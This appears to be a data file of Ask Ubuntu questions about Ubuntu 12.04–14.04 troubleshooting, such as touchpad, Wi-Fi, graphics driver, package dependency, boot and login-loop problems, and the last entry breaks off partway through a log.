512006	touchpad is not getting activated whie normal system startup in ubuntu 12.04 ?	i am facing a bit strange problem on my laptop which has following configuration : ubuntu12.04 lts ( factory version + 1 update ) 3.2.0-67-generic dell inspiron intel ( r ) core ( tm ) i5-3337u cpu @ 1.80ghz 4gb ram if i start my machine using normal way ( .i.e . on the power button ) , login page appears and i am able to login into system . everything is working fine except the touchpad/mouse is not working . i am able to start/do everything ( browsing/playing videos e.t.c ) through the command line . however if i press f12 button while start-up and select the kernel from grub menu and enter , login page appear and this time touchpad/mouse is also working in normal way . my feeling is due to some unknown reason in normal login path keypad is not getting activated and in other way it is getting activated normally . but i am not able to think of any reason/device driver issue for this . both behaviour is always reproducible . i have also verified/tested the complete machine using diagnostic menu ( press f12 after power on and go down in the menu and select diagnostic ) and everything is working fine and even touchpad/mouse is working fine at that moment . could somebody explain what could be possible reason and permanent resolution for this problem ?
512007	determining the effective file permissions	i would like to ask what are the rules that linux os 's are using on ext4 file systems when there are conflicts between directory permission and file permissions . example : drwxrwx -- - user1 group2 folder -rw-r -- r -- user1 group1 file what permissions a user in a group2 on a file file would have ? ... and what is the general rule for determining file permissions in this situations ? thanks .
512014	bluetooth turns on instead of wifi	i have dell inspiron laptop . and i recently installed 14.04 . and whenever i press the hardware button provided for wifi , bluetooth turns on . and i used command sudo service wireless start . this was the reply `` wireless : unrecognized service '' what do i do ?
512015	vgaswitcheroo in xubuntu 14.04	i have a hybrid graphics system and iâve been trying to make my discrete ati graphics card to work but i was never able to . i 've tried installing fglrx but noticed that there is a bug in my case so i would not be able to use catalyst . i learned that vgaswitcheroo would be able to switch activating card . when i type : cat /sys/kernel/debug/vgaswitcheroo/switch i would get : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynoff:000:01:00.0 2 : dis-audio : : off:0000:01:00.1 i tried : echo on > /sys/kernel/debug/vgaswitcheroo/switch but when i typed cat again , nothing seemed to changed . even echo ddis > /sys/kernel/debug/vgaswitcheroo/switch seemed to not work after rebooting . can i get any solution to get discrete card up and running ? thanks .
512016	how to add brightness key to dconf	i recently downloaded ubuntu 14.04 and did a clean installation . i noticed that ubuntu 14.04 does not store screen brightness settings . who can i add a value to dconf to store brightness settings . i looked at alternate ways of doing this , like using a startup script running xbacklight -set . however , i feel a more elegant solution would be to add dconf key and store the value set by the user . ps : i 'm quite new to linux and ubuntu .
512017	ubuntu tweak not working properly in ubuntu 14.04	i have upgraded from ubuntu 12.04 to 14.04.1 after upgrading ubuntu-tweak-tool as not working as expected . the tweak setting is not displaying anything . screenshot is as : there in option showing under appearance , startup , desktop , etc .
512018	can anyone give me the ubuntu 12.04 unity launcher icon png ?	i know this is a very odd question but i did something stupid . i changed the unity launcher icon to the apple icon and when i wanted to get back the default unity launcher icon i got this image : wget -o launcher_bfb.png http : //drive.noobslab.com/data/mac-14.04/launcher-logo/ubuntu/launcher_bfb.png as you can see , this is not the ubuntu 12.04 launcher icon . this is the ubuntu 13.04 , 13.10 and 14.04 icon . can anyone give me the image png . the default one . or if it is somewhere in the system , can you please tell me where . thank you guys
512020	black screen/video drivers crashing on login	i have a new laptop which i have been running ubuntu on for a few days without any problems . now when i turn on the computer it gets to the login screen , and if i try to log into my profile there 's a visual glitch that looks like the video driver crashing , and the screen goes black . logging into a guest account works fine . edit : forgot to mention , the login screen also has this weird visual glitch which i took a picture of here info in case any of this is needed : ubuntu version 14.04.1 lts dell inspiron 3531 intel celeron n2830 intel hd graphics
512021	package dependencies can not be resolved	gdbus.error : org.freedesktop.packagekit.modify.failed : package dependencies can not be resolved - this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but 2.0.8-0ubuntu0.12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.15ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.15ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.6 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed
512022	i can not watch hd videos	my name is matthias . i have a little `` big '' problem . i have a packard bell easynote tk 11 bz with the video card amd radeon hd 6310 can but not a full hd watch videos with your driver , either on the computer or on youtube . thank you . if the one who answers when he speaks german , i beg you to answer in german , this question is translated by google translator
512025	no sound in mac os x 10.9 guest in virtual machine	everyone . i am using ubuntu 14.04 . i 've installed mac osx 10.9 in vmware workstation 10.0.1 . everything is working fine there but i 'm not able to hear any sound in any video . can anyone resolve my problem.thanx
512028	unity top panel changed after resetting unity	my unity top panel has been changed to this after i did a reset to unity . i installed unity tweak tool and then this command : unity-tweak-tool -- reset-unity and the top panel changed the way it looked before : how can i revert back to the original top panel ? any help will be appreciated . thanks .
512029	how to access /var/www/ directory on ubunto 14.04	i ca n't access this directory , and also not creating any file delete or remove why ?
512031	what is the way to update to the next kernel ?	so , i have problems with nouveau preventing from sleep . i decided to go with the newer kernel than officially available . should i install kernel from mainline ppa ( i do know it 's not real ppa ) ? if i do , will my kernel be replaced when matching ( or newer ) kernel is officially released ? what is the way to get that effect ( being in sync with official repos ) ? update i would like not to go with completely automated newer kernel installation , like with ppa : kernel-ppa/ppa ( i mean i do n't want installed packages to be updated automatically ) .
512036	update server 12.04 lts to 14.04 fails	i decided to try updating my 12.04 lts to 14.04 today . every time i try this it ends in an error . w : failed to fetch gzip : /var/lib/apt/lists/partial/au.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_source_sources hash sum mismatch i 'm attempting this upgrade via do-release-upgrade . any ideas ?
512039	ubuntu software center unable to download and install any programs	i am new to ubuntu . i installed ubuntu 13.10 a couple of weeks back . the problem i am facing is that i am unable to download any software using software download manager . i even tried using terminal to download and install software . everytime i get an error stating check your internet connection presently i use my phone as a modem and connect to bsnlnet 3g via bluetooth . internet is working fine with firefox . what can be the issue ?
512040	messed up repair from a livecd - how to re-repair ?	i made a repair-like installation from a 12.04 live cd . it did n't have the option to override the existing ubuntu installation so i was on my own . i unchecked the format option as said , mounted the locations as the current installation ( / on an ext4 partition ) and typed the same user name . installation was finishing up and current state was `` re-installing packages '' when suddenly it stopped and said something like `` could n't re-install packages '' . i ended up with a fresh-like system but it was n't . for example , kernel is 3.11.0-26 and the update manager insists that i do n't have the kernel and it has to be downloaded and installed . same thing for all packages , pulse audio is running but i can not access it , flash is running in firefox but firefox insists that it is n't installed although it is , ... etc . my questions : 1- how do i correctly repair my system from a 12.04 live cd ? 2- how to make the system recognize my packages and display them properly ( i.e in the dash when i search for them , the shortcuts in the launcher bar , shortcuts on the desktop ) ? i tried : apt-get install -- reinstall apt-get autoremove and apt-get autoclean dpkg package repair from recovery mode menu
512046	how to install rastertospl in my usr/lib/cups/filter ?	for installing my samsung ml -1676 printer on ubuntu 12.04 lts how should i add filter rastertospl on my usr/lib/cups/filter folder ?
512047	ubuntu 14.04 and wireless problem using dell vostro 3560	i 'm a linux newbie , i 've just installed ubuntu 14.04 on my dell vostro 3560 with broadcom wireless card . the problem is that i ca n't use wifi on ubuntu 14 ( also on ubuntu 13.10 ) . my network indicator show exactly like picture below no wireless picture can you help me to solve my problem . because i 'm just a linux noob , so i greatly appreciate if you guide me step by step ... thank you very much .
512048	reading from usb drives is extremely slow in ubuntu 12.04	reading/ copying files from external usb drives is extremely slow on my laptop - less than 50 kbps . i have tried with multiple pen drives , and an external hard-drive . i know that there 's no problem in the usb drives themselves , as they function great in my other computer as well as on windows 8.1 partition ( in this very laptop ) . the problem is only with reading though . while writing , i get good speeds of above 20 mbps . i thought that the problem could be with nautilus , and so i tried copying from the terminal . it took over 2 minutes to copy a 7 mb file . so , i want to know what is causing this , and how can i solve this problem ? any help is appreciated .
512049	can i install ubuntu on my laptop which is not very powerful ?	i am going to uninstall windows 8.1 and install ubuntu 14.04.1 lts 64-bit but i am not sure that i am able to do that . here is my laptop specs : hp pavilion 15 '' : processor : amd a6-4455m apu with radeon ( tm ) hd graphics speed : 2.1 ghz number of cores : 2 video card : amd radeon hd 7500g ram : 4 gb operating system : microsoft windows 8.1 , 64-bit
512050	unable to remove text entry from systray	i am using ubuntu 14 and i have created a custom ibus m17n ( .mim file ) input source and everything was working fine . but now i am unable to delete it ( it does n't show up in text entry settings ) , however i manually removed it from ( /usr/share/m17n ) . it still shows up in the systray . how do i remove it ?
512051	vlan & subinterface	is vlan tag and subinterface number is same or they are different . i want to access a vlan enabled device with vlan id 10 , so should i create a subinterface of 10 in eth0 ?
512056	what are the main browsers for ubuntu ?	what are the browsers that i can get on ubuntu ? i know there is firefox , as that comes installed by default , and the ubuntu default browser , but what others are there that you can install ? i am confident using apt-get and the software centre , and i am also interested if there are some like chrome that are widely used but not in the software centre ?
512059	using 'dd ' command to create bootable usb stick	why iso images of some flavours of ubuntu can be put on usb stick by dd command and boot successfully , while others flavours do n't ? moreover it looks like it is dependant of particular usb stick too . i tried with standard ubuntu : $ sudo dd if=./ubuntu.iso of=/dev/sdd bs=8129 and it works like charm , i mean : boot and installs or run live ubuntu . but when i use another usb stick prepared the same way , it fails to boot with operating system not found bios error . when i try the ubuntu gnome , then it simply does not boot with the same error as in previous example , regardless of which one usb stick i use . i know , that there is startup disk creator application in ubuntu , but i have been convinced , that it is only a gui facade for simple dd command , and i can always use dd to create bootable usb stick , at least for linux . am i wrong ?
512061	ca n't run ubuntu sdk apps in emulator	ubuntu 14.04.1qt creator 3.1.1ubuntu touch : image version 189 & 179 i recently upgraded from 12.04 to 14.04 lts ( with ubuntu sdk installed , and i did re-enable the ubuntu-sdk repository ) and finally able to get the ubuntu emulator working . however , the sdk does n't seem to be able to run created app in the emulator . it stucks at `` waiting for your emulator to get ready '' , even though the emulator has already been successfully started with device status : ready . are there any solutions ? please tell me if there are more informations i should provide . thank you in advance .
512064	black screen after upgrading to 14.04 from 12.04	i clicked the 'upgrade ' button on the 'software manager ' , which i have since read was perhaps not a brilliant idea . next i had a lapse of good sense when i was advised that my graphics adapter may not work properly - it worked fine in 14.04 - what could possibly go wrong , hmmm ... now startup works fine with the ubuntu logo etc , but finally i get a black screen . however , i do use teamviewer to control other machines and its two windows start up and display perfectly and i can use it to connect to another machine and that screen shows perfectly . going to the command line i have gleaned the following : the processor is an amd athlon ii x64 640 . i made a mistake when installing 12.04 originally and that is 32 bit . xdpyinfo returns : unable to open display '' '' . the the onboard video is radeon3000 . because this machine is also a file server for the rest of us a clean install would be a bit of a pain . malcolm
512067	ubuntu 12.04 update nightmare and grub tiny problem	i had some problems with the updates lately . it started with the update manager refusing to update because it requires installation of untrusted packages . i used : sudo apt-get update & & sudo apt-get upgrade and there were errors as well and said that 0 installed or updated or removed . then after some time , ubuntu showed a red circle in the top bar saying that there might be dependencies that are unmet . i used sudo apt-get update and then sudo apt-get ugrade , strangely it worked but after that update manager now shows me there are some updates and when i try to update it says that some packages require installation of untrusted packages , again . ran the update and upgrade command , non were installed or updated . what shall i do now ? one more thing , after the last update , grub was updated i think and it now shows two entries for windows 7 ( dual booting ) one of them on sda1 and the other on sdb1 .. windows 7 boots normally from sda1 , same as before . how can i remove the other entry .
512068	ubuntu boot up after installing	i installed ubuntu using usb and i had no problem installing it but after shutting down the computer and when i turn it on it shows the menus ( try ubuntu without installing , install ubuntu , oem install , check disc for defects ) do i need to reinstall ubuntu everytime i restart my computer or how do you boot your computer ? also is there a way to boot your computer without the usb after the installation ?
512071	partition mounting problem	i have a ntfs partition called data which automatically mount at boot ( on /media/data ) . it gone good since now : in /media i have a data empty folder which i ca n't delete , and a data_ folder , where the data partition is mounted . how can i remount my partition on /media/data and not on /media/data_ anymore ?
512072	installing synaptic package manager from outside the repos	i have been facing some problems in installing software with ubuntu software center , due to the fact that i have not been able to run no proxy for the whole system , i have tried all methods prescribed in various websites to do the same but i always get 407 proxy authentication required . so i want to install synaptic package manager through source code or .deb file which can be downloaded from the internet and then installed manually . please post the link from which the same can downloaded and also steps to install it manually . a little detail would be of great help as i am a beginner and unaware of the nuances . as suggested in one of the answers when i download the .deb package and perform sudo dpkg -i synaptic_0.81.2_amd64.deb in the terminal this is what happens ... i am not able to make out where there has been a mistake .
512076	failed installing libamd2.2.0 , libumfpack5.4.0 and libatlas-sse2-dev	i have a script i run on erach new machine i own , that installs somethings i need . for some reason , on a dell inspiron 3542 with ubuntu 14.04 , the following fails : $ sudo apt-get install libamd2.2.0 libumfpack5.4.0 libatlas-sse2-dev with the errors : reading package lists ... done building dependency tree reading state information ... done package libatlas-sse2-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package libamd2.2.0 e : could n't find any package by regex 'libamd2.2.0' e : unable to locate package libumfpack5.4.0 e : could n't find any package by regex 'libumfpack5.4.0' e : package 'libatlas-sse2-dev ' has no installation candidate btw , i did try sudo apt-get update first . with other computers this always worked for me before . how can i fix that ?
512077	what 's my public ip over a tor ?	i 'm attempting to figure out how to obtain the ip address that represents my connection over a tor network . what do i type into a terminal to see this information . ultimately , i 'm attempting to create an auto-log of my tor connections for security purposes .
512079	ca n't install driver for tenda wireless adapter w322ua	can anybody help me . i have a cd with drivers for linux , but it is .bz2 extension . i extracted it , found some readme , but it did n't helped because i did n't fully understand the steps . somebody please help .
512081	root preferences	after installing ubuntu 14.04 onto my hard drive i have discovered that 350 gb of my 500 gb drive is used up . how do i remove the unneeded files and where did they come from ? files home/local/share/trash/expunged/2022664880/recup_dir . 9999 down to 1 .
512085	android usb debugging disappeared and not working anymore	i was working on my project using my own device ( lg optimus g e975 , android 4.4.2 ) on ubuntu 12.04 , and everything was going fine , eclipse could detect the device and i could easily debug on device . suddenly the debugging icon in status bar was gone and the only thing it now shows is the charging icon , the usb debugging is turned on in developer options . when i connect my phone to laptop and using adb devices it does n't find any device . i 've tried pluging the device to laptop many times and still the same . what could possibly go wrong ? ?
512086	how to remove ubuntu without the ubuntu partition	i would like to remove my ubuntu which is dual-booting with windows 7 . i do n't remember how i installed it , but the ubuntu partition does not appear on the disk management . ( have a system partition of 2gb , what is that ? ) i installed the easybcd to remove ubuntu from the boot menu , but after a restart the boot menu is still there with the ubuntu option , and reappears in the easybcd after i deleted it . i have no idea what to do now , can any one suggest anything . i really prefer not to format the drive . thanks for any help .
512088	ubuntu 14.04 gui crash since update to intel 1.0.6	a couple of weeks ago i 've installed the intel driver 1.0.6 on a ( rather ) fresh install of ubuntu 14.04 on a lenovo e330 laptop . since then i can not get a gui ( short error message and computer hangs ) and more often than not i can not even get into the terminal . i wonder if there is a way to `` roll back '' the previous display drivers , maybe by removing the intel 1.0.6 ? i want to try to fix it in stead of resorting to formatting the drive and reinstalling ubuntu . as said , i can ( at times ) gain access to the terminal and i even have a live version on a pendrive ( also can not access and edit files from the live version ) . i have tried to roll back xorg.conf to the previous version but a reboot merely reconfigured that to the messed up version . i have seen a thread here and a couple more on other sites about about this problem , when getting a low resolution gui , but i can not even get that . i get an option to work under low graphics but when i choose that , the computer merely hangs . -- - update -- - i 've uninstalled it according to thread updated intel display driver causing errors when booting although the only thing that worked was the purge . after the reboot i managed to get the background image and a crash report , but no unity or any form of interface , not even access to terminal . any suggestions ?
512090	how to get pantheon greeter on ubuntu 14.04 instead of lightdm	i 'm running ubuntu 14.04 , how can i replace the lockscreen with the one on elementary luna ( pantheon-greeter ) . thank you ! ! edit : can anyone do it and confirm it works completely ?
512091	lenovo y500 webcam not detected in ubuntu	the in-built webcam is not being detected in ubuntu 14.04 and now even in windows ( dual boot ) . i am using a lenovo ideapad , model y500 . ubuntu packages are up-to-date . cheese shows `` no device found '' . output of lscpi : sandeshc @ sandeshc : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gk107 hdmi audio controller ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) 03:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) 04:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 04:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 04:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 30 ) 04:00.4 system peripheral : jmicron technology corp. xd host controller ( rev 30 ) output of lsusb : sandeshc @ sandeshc : ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0cf3:3004 atheros communications , inc . bus 001 device 003 : id 045e:0084 microsoft corp . basic optical mouse bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i have already tried a few suggestions that were on askubuntu but none of them were helpful . ( there is no toggle webcam function using fn+ ( somekey ) option , and even the solution given here : ubuntu does not detect my vaio webcam ) .
512092	how to set modem on ( huawei mobile broadband )	i have ubuntu 14.04 and problem with mobile internet ( huawei usb-stick ) . when stick is plugged in upper left usb slot , everything works fine , when is plugged in any of two slots in lower right - not working at all . at first i thought that device can not be recognized , but ubuntu recognize it clearly , how do i set modem on ? when in first usb slot : my.comp @ skynet : ~ $ lsusb ... bus 003 device 006 : id 12d1:1c08 huawei technologies co. , ltd. ... when in second usb slot : my.comp @ skynet : ~ $ lsusb ... bus 003 device 007 : id 12d1:1c0b huawei technologies co. , ltd. e173s 3g broadband stick ( modem off ) ... i hope that this is not duplicate question , i 've red ( and tried ) most of the solutions posted here , none worked
512093	14.04 : ldap users ca n't start applications	i use 14.04 and ldap on a debian server . after upgrade from 12.04 to 14.04 i got an problem . if i login with an ldap-user , this user ca n't start e.g . firefox or libreoffice . but he can start e. g. a terminal . can someone tell me , what causes this problem or where i can find more informations ( which log-file ? ) wthank you
512098	how to change my own home directory ?	i use this command to change my home directory sudo usermod -d new-path -m myname but i got this error usermod : user myname is currently logged in how could i change my own home directory and move all files into new-path ? thanks for any suggestions . edit : this server is a remote vm , and connected with putty ( ubuntu 12.04 )
512100	no sound with a creative sound blaster zxr soundcard on ubuntu 14.04	first of all . i know that there is no offcial driver support on their website . but the sound card is at least recognized in the sound-settings . so ... is there a way to get the zxr working ? i tried to install the windows-drivers via wine but of course with no success . can anyone help ?
512104	konsole is stuck	i can not use terminal for anything . this message keeps appearing , blocking all attempts to add commands : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? any tips on how to remedy this ? cheers , x-man
512107	i ca n't open my hard drives	i installed ubuntu two days ago along with windows 8 but i found two problems the first is that ubuntu give me an error when i try to open any of the hard drives rather than the one which i installed ubuntu on and the second one is windows 8 also ca n't open the drive on which i have ubuntu but it can open the other drives it is my first time to use ubuntu so please explain the solution in details thanks in advance the error message : '' unable to access drive error mounting /dev/sda6 at /media/maher/drive : commang-line mount -t '' ntfs '' -o disk contains an unclean file system ( 0 , 0 ) metadata kept in windows cache , refused to mount the ntfs patition is in an unsafe state . please resume and shutdown or mount volume read only with `` ro '' mount option .
512108	problem creating bootable disk from lubuntu 14.04	i 'm using lubuntu 14.04 and i ca n't create a bootable usb stick from this os . i 've used 12.04 before and all i had to do was run the bootable device creator , but not id does n't seem to work . my usb stick is detected and the computer claims that it is not a bootable file . i 'm getting pretty sad as i need to install some linux on an old computer i will give to my sister . otherwise she will ask me to use mine all the time . i 've alredy tried a few different usb sticks and even different distros . also used unetbootin and the results were the same . tried to boot from this same computer and it 's just the same . it is 'not a bootable file' am i doing anything wrong ? thanks in advance
512109	how to remove google chrome error popup - `` your preferences can not be read ... '' on ubuntu ?	since past few days , whenever i start google chrome , i have been getting this popup error message saying `` your preferences can not be read ... '' i have n't faced any issues in normal browser usage , but i am not able to remove this error . my os version is ubuntu 13.10 . chrome version is 36.0.1985.143 . any pointer is appreciated .
512111	bluetooth headphones with electric guitar	i am unable to listen to my electic guitar on my bluetooth headphones . at present i can listen a-ok with : lindy usb guitar cable qjackctl rakarrack wired headphones the bluetooth headphones work perfectly with other sources like rhythmbox , vlc and xbmc . ideas and suggestions much appreciated . thanks for your time .
512112	ubuntu session expire	my problem is that my internet was dismissed after some time while ubuntu on stand by .i need to log in for access internet so while i download movies it take too much times so when ubuntu on stand by os destroy the session .so i need to again log in for access internet
512114	transferring contacts from nokia e71	i 've a nokia e71 whose contacts and messages i need to back up . how do i do this ? point to ponder i 've only started using ubuntu for the last 24 hrs .
512117	how can you install mono 3.x on earlier versions of ubuntu ( 12.x ) ?	we are developing a video game we intend to release on linux . it requires the use of the mono 3.x runtime . however the command apt-get install mono-complete only installs mono 2.10 . how can we get mono 3.x on a ubuntu 12.x os in a way that is as user-friendly as possible ?
512119	add files to ubuntu desktop disk image	i would like to create an ubuntu 14.04 disk , with some extra files on the desktop - for instance , some html files with instructions for some project . what 's the right way to edit the iso file and add files to the desktop , that would be available when booted as a live cd ? i am using a dvd media , so size is not an issue .
512123	ubuntu 14.04 desktop icons do n't display for awhile after reboot	when i boot up my system , the desktop icons do n't show up initially . after about 5 minutes , poof there they are . i first noticed it after removing/adding some packages related to sound drivers . i hear popping and crackling when playing opengl games , and i still have n't solved that issue . any ideas on how to determine why the icons take so long to load ?
512125	how to install gala on xubuntu 14.04 ?	i tried to install gala window manager ( the windows manager of elementary os ) on xubuntu 14.04 as described for example here , but seems like there is an unmet dependency . the error is the following packages have unmet dependencies : gala : depends : libmutter0d 3.12.2-1ubuntu99~elementary0.3.4 ) but it is not installable e : unable to correct problems , you have held broken packages . i also installed the libmutter0d package but the error persists . is there something i can do to get through this ? since the beta1 of the new version of elementary ( based on ubuntu 14.04 ) is testable , another option would be installing the beta version of gala . i 'm not sure if it is possible , but is yes , what are the necessary step to do so ?
512131	how to make python script executable in ubuntu ?	i want to execute a python script by just double clicking , without going to the terminal/shell . i already add the hashbang/shebang to the script and make it executable but it just open in gedit when i double click it .
512133	prevent network injection	i read this article : http : //gizmodo.com/pro-hackers-could-be-spying-on-you-through-youtube-1622367382 i 'm running ubuntu 14.04 . how can i prevent network injection of my internet browsing traffic ? is there a way to encrypt all traffic ? would a proxy server help ?
512134	error boot ubuntu .. !	i installed ubuntu with windows 7 ultimate and when the installation finished it asked me to reboot . after rebooting i removed my flash disk [ which has the ubuntu installer + data burned on it ] and choose ubuntu to start up , but then i got the following error-message : mount failed for selinux on /sys/fs/selinux : no such file or directory
512136	'activate element with one click ' setting does not work	i 'm using xubuntu 14.04.1 although i set the option 'activate element with one click ' in xfce4-settings-manager / file manager settings / behavior dialogue i still need to use double click on the create launcher icon ( right click on an empty part of desktop ) to select a working directory . where can i report this ( i admit little ) bug ?
512137	how to change separately speed of pointer for mouse / touchpad ?	recently i 've connected usb mouse to my laptop with touchpad . in mouse and touchpad settings section i see only touchpad pointer speed . now mouse moves a pointer too fast . how do i change that ? 14.04 mouse and touchpad settings screenshot :
512141	login loop after upgrading to 14.04 from ubuntu 12.04	after upgrading from ubuntu 12.04 to 14.04 i get a login loop . however , i 'm able to login using terminal ( ctrl + alt + f1 ) , and also checked the ~/.xsession-errors file . it showed /usr/sbin/lightdm-session : exec 5 : init : permission denied . i also tried removing the ~/.xauthority file but it did n't work . permissions of xauthority files are user , so no problem there . what can i do ? xsession.errors file : script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . /usr/sbin/lightdm-session : 5 : exec : init : permission denied lightdm x-0-greeter.log : activating service name='org.a11y.atspi.registry' [ +0.00s ] debug : unity-greeter.vala:496 : starting unity-greeter 14.04.10 uid=104 lang=en_in [ +0.00s ] debug : unity-greeter.vala:499 : setting cursor [ +0.00s ] debug : unity-greeter.vala:513 : loading command line options [ +0.00s ] debug : unity-greeter.vala:541 : setting gtk+ settings successfully activated service 'org.a11y.atspi.registry' ** ( at-spi2-registryd:3010 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:3010 ) : warning ** : unable to register client with session manager [ +0.07s ] debug : unity-greeter.vala:564 : creating unity greeter [ +0.07s ] debug : unity-greeter.vala:57 : creating background surface [ +0.07s ] debug : connecting to display manager ... [ +0.07s ] debug : wrote 18 bytes to daemon [ +0.08s ] debug : read 8 bytes from daemon [ +0.08s ] debug : read 150 bytes from daemon [ +0.08s ] debug : connected version=1.10.1 default-session=ubuntu show-manual-login=false hide-users=false has-guest-account=true show-remote-login=true [ +0.11s ] debug : menubar.vala:335 : lang=en_in language=en_in : en [ +0.12s ] debug : menubar.vala:367 : lang=en_in language=en_in : en [ +0.12s ] debug : loading users from org.freedesktop.accounts [ +0.12s ] debug : user /org/freedesktop/accounts/user1000 added [ +0.14s ] debug : user-list.vala:1030 : adding/updating user ashish ( ashish jain ) [ +0.14s ] debug : loading sessions from org.freedesktop.displaymanager [ +0.15s ] debug : user-list.vala:1012 : adding guest account entry [ +0.27s ] debug : loaded session /usr/share/xsessions/ubuntu.desktop ( ubuntu , this session logs you into ubuntu ) [ +0.27s ] debug : ignoring session /usr/share/xsessions/gnome.desktop [ +0.27s ] debug : starting authentication for user ashish ... [ +0.27s ] debug : wrote 22 bytes to daemon [ +0.27s ] debug : main-window.vala:185 : screen is 1366x768 pixels [ +0.27s ] debug : main-window.vala:193 : monitor 0 is 1366x768 pixels at 0,0 [ +0.27s ] debug : unity-greeter.vala:567 : showing greeter [ +0.27s ] debug : unity-greeter.vala:252 : showing main window [ +0.28s ] debug : background.vala:483 : regenerating backgrounds [ +0.28s ] debug : background.vala:68 : making background /usr/share/backgrounds/warty-final-ubuntu.png at 1366x768 [ +0.29s ] warning : unity-greeter.vala:587 : error starting upstart for indicators : failed to execute child process `` init '' ( permission denied ) [ +0.30s ] debug : unity-greeter.vala:610 : starting main loop [ +0.30s ] debug : read 8 bytes from daemon [ +0.30s ] debug : read 36 bytes from daemon [ +0.30s ] debug : prompt user with 1 message ( s ) [ +0.31s ] debug : background.vala:68 : making background /home/ashish/pictures/red_fox_sleeping-wallpaper-1366x768.jpg at 1366x768 [ +0.31s ] debug : background.vala:159 : error loading background : failed to open file '/home/ashish/pictures/red_fox_sleeping-wallpaper-1366x768.jpg ' : permission denied [ +0.36s ] debug : settings-daemon.vala:75 : acquired org.gnome.sessionmanager [ +0.36s ] debug : settings-daemon.vala:102 : acquired org.gnome.screensaver [ +0.36s ] debug : settings-daemon.vala:159 : all bus names acquired , starting unity-settings-daemon [ +0.38s ] debug : unity-greeter.vala:235 : starting system-ready sound [ +0.42s ] debug : background.vala:121 : render of background /home/ashish/pictures/red_fox_sleeping-wallpaper-1366x768.jpg complete [ +0.42s ] debug : background.vala:138 : images [ 0 ] was null for /home/ashish/pictures/red_fox_sleeping-wallpaper-1366x768.jpg [ +0.44s ] debug : main-window.vala:185 : screen is 1366x768 pixels [ +0.44s ] debug : main-window.vala:193 : monitor 0 is 1366x768 pixels at 0,0 ** ( unity-settings-daemon:3047 ) : warning ** : unable to register client : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such method 'registerclient' [ +0.56s ] debug : menubar.vala:537 : adding indicator object 0x9e16244 at position 0 [ +0.57s ] debug : background.vala:121 : render of background /usr/share/backgrounds/warty-final-ubuntu.png complete ** ( nm-applet:3041 ) : critical ** : nm_secret_agent_register : assertion 'priv- > registered == false ' failed nm-applet-message : using fallback from indicator to gtkstatusicon [ +303.61s ] debug : settings-daemon.vala:209 : screensaver activated [ +625.69s ] debug : settings-daemon.vala:211 : screensaver disabled [ +630.60s ] debug : starting authentication for guest account ... [ +630.60s ] debug : wrote 12 bytes to daemon [ +630.60s ] debug 